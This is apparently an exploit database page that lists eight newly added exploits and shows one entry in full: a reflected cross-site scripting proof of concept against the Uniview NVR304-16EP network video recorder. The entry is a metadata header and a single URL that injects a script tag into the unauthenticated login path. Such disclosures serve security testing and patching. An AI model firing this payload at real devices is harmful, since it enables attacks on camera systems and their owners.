a300bd948f
8 changes to exploits/shellcodes TeamSpeak 3.5.6 - Insecure File Permissions Emerson PAC Machine Edition 9.80 Build 8695 - 'TrapiServer' Unquoted Service Path H3C SSL VPN - Username Enumeration Multi-Vendor Online Groceries Management System 1.0 - 'id' Blind SQL Injection Simple Student Quarterly Result/Grade System 1.0 - SQLi Authentication Bypass ServiceNow - Username Enumeration Network Video Recorder NVR304-16EP - Reflected Cross-Site Scripting (XSS) (Unauthenticated) WordPress Plugin Error Log Viewer 1.1.1 - Arbitrary File Clearing (Authenticated)
13 lines
No EOL
584 B
Text
13 lines
No EOL
584 B
Text
# Exploit Title: Network Video Recorder NVR304-16EP - Reflected Cross-Site Scripting (XSS) (Unauthenticated)
|
|
# Author: Luis Martinez
|
|
# Discovery Date: 2022-02-13
|
|
# Vendor Homepage: https://www.uniview.com/Products/NVR/Easy/NVR304-S-P/#~Product%20features
|
|
# Datasheet of NVR304-S-P: https://www.uniview.com/download.do?id=1819568
|
|
# Tested Version: NVR304-16EP
|
|
# Tested on: Windows 10 Pro 21H2 x64 es - Firefox 91.6.0esr
|
|
# Vulnerability Type: Reflected Cross-Site Scripting (XSS)
|
|
# CVE: N/A
|
|
|
|
# Proof of Concept:
|
|
|
|
http://IP/LAPI/V1.0/System/Security/Login/"><script>alert('XSS')</script> |